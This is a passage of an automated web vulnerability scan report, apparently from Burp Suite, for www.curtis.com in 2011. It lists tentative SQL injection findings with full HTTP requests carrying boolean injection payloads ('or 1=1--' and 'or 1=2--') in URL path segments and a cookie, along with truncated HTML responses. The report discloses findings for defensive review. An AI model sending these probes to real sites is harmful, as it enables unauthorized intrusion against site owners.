Cookie: sifrFetch=true10585096'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.29. http://www.curtis.com/flash/curtis.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/flash/curtis.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 52212528'%20or%201%3d1--%20 and 52212528'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash52212528'%20or%201%3d1--%20/curtis.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /flash52212528'%20or%201%3d2--%20/curtis.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">

...[SNIP]...

1.30. http://www.curtis.com/flash/curtis.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/flash/curtis.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21436775'%20or%201%3d1--%20 and 21436775'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash/curtis.swf21436775'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /flash/curtis.swf21436775'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">

...[SNIP]...

1.31. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 23520338'%20or%201%3d1--%20 and 23520338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts23520338'%20or%201%3d1--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts23520338'%20or%201%3d2--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.32. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15465428'%20or%201%3d1--%20 and 15465428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange15465428'%20or%201%3d1--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange15465428'%20or%201%3d2--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.33. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13057657'%20or%201%3d1--%20 and 13057657'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
